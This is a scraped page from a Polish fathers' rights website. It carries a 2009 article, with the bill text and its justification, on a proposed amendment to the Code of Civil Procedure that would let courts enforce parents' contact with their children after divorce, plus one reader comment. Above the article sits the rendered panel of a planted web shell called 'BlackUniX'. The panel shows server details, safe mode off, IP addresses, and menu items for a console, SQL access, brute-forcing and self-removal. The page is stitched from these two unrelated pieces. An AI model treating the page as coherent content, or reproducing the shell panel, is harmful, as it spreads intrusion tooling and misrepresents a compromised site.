W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:55:04
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Nareszcie sposób na kontakty
23.02.2009.
Projekt nowelizacji KPC zwiększający skuteczność egzekucji kontaktów rodzica z dzieckiem trafił do Sejmu. Wnioskodawcą projektu nowelizacji jest Fundacja Akcja. Projekt powstał we współpracy z Nadzwyczajną Komisją Sejmową Przyjazne Państwo, która skierował go do Sejmu, jako projekt poselski.

Prace nad projektem w Komisji PP trwały od grudnia 2008. Projekt ustawypowinien wywołać pozytywny skutek społeczny polegający na zapewnieniupodtrzymywania więzów rodzinnych pomiędzy dziećmi a rodzicami, którzy ztymi dziećmi nie zamieszkują ze względu na rozwód, lub rozpad związkunieformalnego.

 

UZASADNIENIE

1 . Wyjaśnienie celu ustawy.

            Celem proponowanej w projekcie zmiany jest wprowadzenie do polskiego systemu prawnego narzędzi, przy pomocy których sądy opiekuńcze będą mogły wyegzekwować w sposób zgodny ze swoimi wcześniejszymi orzeczeniami kontakt obojga rodziców z dzieckiem, np. w przypadku orzeczenia rozwodu, gdy sąd  opiekuńczy rozstrzyga o władzy rodzicielskiej nad wspólnym małoletnim dzieckiem obojga małżonków i o kontaktach rodziców z dzieckiem, a rodzic, u którego dziecko zamieszkuje uniemożliwia bądź utrudnia te kontakty.

             Zapewni to jednocześnie pełniejszą realizację normy wyrażonej w art. 113 § 1 ustawy z dnia 25 lutego 1964 r. – Kodeks rodzinny i opiekuńczy (Dz. U. Nr 9, poz. 59, z późn. zm.), który stanowi, że niezależnie od władzy rodzicielskiej rodzice oraz ich dziecko mają prawo
i obowiązek utrzymywania ze sobą kontaktów.

            Projekt ustawy nie wymaga wydawania aktów wykonawczych, a więc wymóg określony w art. 34 ust. 1 pkt 6 Regulaminu Sejmu nie wymaga w przedmiotowym przypadku spełnienia.

 

2 . Przedstawienie stanu obecnego.

            W obecnym stanie prawnym polskie ustawodawstwo nie przewiduje skutecznych rozwiązań mających na celu umożliwienie również rodzicom, u których nie przebywa dziecko, kontaktów z tym dzieckiem w sposób określony np. w wyroku orzekającym rozwód.

 

3 . Różnice między dotychczasowym a przewidywanym stanem prawnym.

            Projekt ustawy proponuje dodanie do ustawy z dnia 17 listopada 1964 r. - Kodeks postępowania cywilnego nowego art. 59814, zgodnie z którym przepisy art. 5985-59812 stosuje się odpowiednio do wykonania orzeczeń wydanych na podstawie art. 58 § 1 i §1a i art. 1131 ustawy z dnia 25 lutego 1964 r. – Kodeks rodzinny i opiekuńczy (Dz. U. Nr 9, poz. 59, z późn. zm.) w zakresie kontaktów rodziców z dzieckiem.

            Należy podkreślić, że treść proponowanego przepisu uwzględnia również ustawę z dnia 6 listopada 2008 r. o zmianie ustawy – Kodeks rodzinny i opiekuńczy oraz niektórych innych ustaw.

            Dodawany art. 59814 kpc opiera się na funkcjonujących już w Kodeksie postępowania cywilnego rozwiązaniach, dotyczących uprawnień władczych sądu opiekuńczego na wypadek konieczności odebrania osoby podlegającej władzy rodzicielskiej lub pozostającej pod opieką. W związku z tym, że sądy konstrukcję tę stosują na co dzień, w praktyce nie powinna ona stworzyć problemów w zakresie implementacji do wypadków egzekwowania praw rodziców pozbawianych wbrew wyrokom sądów kontaktów z dzieckiem.

            Odpowiednie zastosowanie art. 5985-59812 będzie polegało na zleceniu przez sąd opiekuńczy kuratorowi sądowemu przymusowego wyegzekwowania kontaktów dziecka z rodzicem. W standardowych sytuacjach powinno to polegać na umówieniu spotkania rodzica z dzieckiem, a następnie stawieniu się kuratora na to spotkanie celem sprawdzenia, czy drugi rodzic to spotkanie umożliwił. W ekstremalnych przypadkach, w związku                  z możliwym odpowiednim zastosowaniem art. 59810 kpc,  na żądanie kuratora sądowego Policja będzie obowiązana do udzielenia mu pomocy przy czynnościach związanych                z wyegzekwowaniem kontaktów rodzica z dzieckiem.

            Z kolei w związku z możliwym zastosowaniem art. 59811 § 1 kpc,  jeżeli rodzic, pod którego opieką znajduje się dziecko ukrywa je, kurator sądowy zawiadomi prokuratora.

            W konsekwencji, jak się zdaje, powyższe instrumentarium prawne da realne szanse na właściwe kontakty obojga rozwiedzionych rodziców z dzieckiem.

 

 4. Przewidywane skutki społeczne, gospodarcze finansowe i prawne.

            Projekt ustawy może spowodować dodatkowe koszty dla  budżetu państwa ze względu na nałożenie na kuratorów sądowych i Policję nowych obowiązków.

            Oszacowanie wpływu projektowanych zmian dla budżetu państwa oraz budżetu jednostek samorządu terytorialnego zależy od liczby spraw, w których do wykonania orzeczeń wydanych na podstawie stosownych artykułów Kodeksu rodzinnego i opiekuńczego w zakresie kontaktów rodziców z dzieckiem angażowani będą kuratorzy oraz inne podmioty.

            Projekt ustawy powinien wywołać pozytywny skutek społeczny polegający na zapewnieniu podtrzymywania więzów rodzinnych pomiędzy dziećmi a rodzicami, którzy z tymi dziećmi nie zamieszkują ze względu na rozwód.

 

5. Oświadczenie o zgodności projektu ustawy z prawem Unii Europejskiej.

            Projekt ustawy nie jest objęty prawem Unii Europejskiej .

 

 

projekt FA/B-138(2)

USTAWA

z dnia ……………..2009 r.

 

o zmianie ustawy – Kodeks postępowania cywilnego

 

 

Art. 1.

W ustawie z dnia 17 listopada 1964 r. - Kodeks postępowania cywilnego (Dz. U. Nr 43, poz. 296, z późn. zm.1)) po art. 59814 dodaje się art. 59815 w brzmieniu:

 

„Art. 59815. Przepisy art. 5985-59812 stosuje się odpowiednio do wykonania orzeczeń wydanych na podstawie art. 58 § 1 i §1a i art. 1131 ustawy z dnia 25 lutego 1964 r. – Kodeks rodzinny i opiekuńczy (Dz. U. Nr 9, poz. 59, z późn. zm.2)) w zakresie kontaktów rodziców z dzieckiem, w przypadku gdy orzeczenia te nie są wykonywanie albo są nieprawidłowo wykonywane.”.

 

 

Art. 2.

Ustawa wchodzi w życie z dniem 1 lipca 2009 r.1) Zmiany wymienionej ustawy zostały ogłoszone w Dz. U. z 1965 r. Nr 15, poz. 113, z 1974 r. Nr 27, poz. 157 i Nr 39, poz. 231, z 1975 r. Nr 45, poz. 234, z 1982 r. Nr 11, poz. 82 i Nr 30, poz. 210, z 1983 r. Nr 5, poz. 33, z 1984 r. Nr 45, poz. 241 i 242, z 1985 r. Nr 20, poz. 86, z 1987 r. Nr 21, poz. 123, z 1988 r. Nr 41, poz. 324, z 1989 r. Nr 4, poz. 21 i Nr 33, poz. 175, z 1990 r. Nr 14, poz. 88, Nr 34, poz. 198, Nr 53, poz. 306, Nr 55, poz. 318 i Nr 79, poz. 464, z 1991 r. Nr 7, poz. 24, Nr 22, poz. 92 i Nr 115, poz. 496, z 1993 r. Nr 12, poz. 53, z 1994 r. Nr 105, poz. 509, z 1995 r. Nr 83, poz. 417, z 1996 r. Nr 24, poz. 110, Nr 43, poz. 189, Nr 73, poz. 350 i Nr 149, poz. 703, z 1997 r. Nr 43, poz. 270, Nr 54, poz. 348, Nr 75, poz. 471, Nr 102, poz. 643, Nr 117, poz. 752, Nr 121, poz. 769 i 770, Nr 133, poz. 882, Nr 139, poz. 934, Nr 140, poz. 940 i Nr 141, poz. 944, z 1998 r. Nr 106, poz. 668 i Nr 117, poz. 757, z 1999 r. Nr 52, poz. 532, z 2000 r. Nr 22, poz. 269 i 271, Nr 48, poz. 552 i 554, Nr 55, poz. 665, Nr 73, poz. 852, Nr 94, poz. 1037, Nr 114, poz. 1191 i 1193 i Nr 122, poz. 1314, 1319 i 1322, z 2001 r. Nr 4, poz. 27, Nr 49, poz. 508, Nr 63, poz. 635, Nr 98, poz. 1069, 1070 i 1071, Nr 123, poz. 1353, Nr 125, poz. 1368 i Nr 138, poz. 1546, z 2002 r. Nr 25, poz. 253, Nr 26, poz. 265, Nr 74, poz. 676, Nr 84, poz. 764, Nr 126, poz. 1069 i 1070, Nr 129, poz. 1102, Nr 153, poz. 1271, Nr 219, poz. 1849 i Nr 240, poz. 2058, z 2003 r. Nr 41, poz. 360, Nr 42, poz. 363, Nr 60, poz. 535, Nr 109, poz. 1035, Nr 119, poz. 1121, Nr 130, poz. 1188, Nr 139, poz. 1323, Nr 199, poz. 1939 i Nr 228, poz. 2255, z 2004 r. Nr 9, poz. 75, Nr 11, poz. 101, Nr 68, poz. 623, Nr 91, poz. 871, Nr 93, poz. 891, Nr 121, poz. 1264, Nr 162, poz. 1691, Nr 169, poz. 1783, Nr 172, poz. 1804, Nr 204, poz. 2091, Nr 210, poz. 2135, Nr 236, poz. 2356 i Nr 237, poz. 2384, z 2005 r. Nr 13, poz. 98, Nr 22, poz. 185, Nr 86, poz. 732, Nr 122, poz. 1024, Nr 143, poz. 1199, Nr 150, poz. 1239, Nr 167, poz. 1398, Nr 169, poz. 1413 i 1417, Nr 172, poz. 1438, Nr 178, poz. 1478, Nr 183, poz. 1538, Nr 264, poz. 2205 i Nr 267, poz. 2258, z 2006 r. Nr 12, poz. 66, Nr 66, poz. 466, Nr 104, poz. 708 i 711, Nr 186, poz. 1379, Nr 208, poz. 1537 i 1540, Nr 226, poz. 1656 i Nr 235, poz. 1699 oraz z 2007 r. Nr 7, poz. 58, Nr 47, poz. 319, Nr 50, poz. 331, Nr 99, poz. 662, Nr 106, poz. 731, Nr 112, poz. 766 i 769, Nr 115, poz. 794, Nr 121, poz. 831, Nr 123, poz. 849, Nr 176, poz. 1243 i Nr 181, poz. 1287.

2) Zmiany wymienionej ustawy zostały ogłoszone w Dz. U. z 1975 r. Nr 45, poz. 234, z 1986 r. Nr 36, poz. 180, z 1990 r. Nr 34, poz. 198, z 1995 r. Nr 83, poz. 417, z 1998 r. Nr 117, poz. 757, z 1999 r. Nr 52, poz. 532, z 2000 r. Nr 122, poz. 1322, z 200s1 r. Nr 128, poz. 1403 i Nr 154, poz. 1804, z 2003 r. Nr 83, poz. 772 i Nr 130, poz. 1188, z 2004 r. Nr 162, poz. 1691 oraz z 2007 r. Nr 121, poz. 831, Nr 134, poz. 947 i Nr 192, poz. 1378

 

 

 

 
« poprzedni artykuł   następny artykuł »

komentarze

czyli będę mógł być z synami częściej niż 2h co 14 dni??? (jeśli ich matka czegoś nie wymyśli)

Napisał zalesianin, dzień 03/01/2009 o 07:43

 1 
Strona 1 z 1 ( 1 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.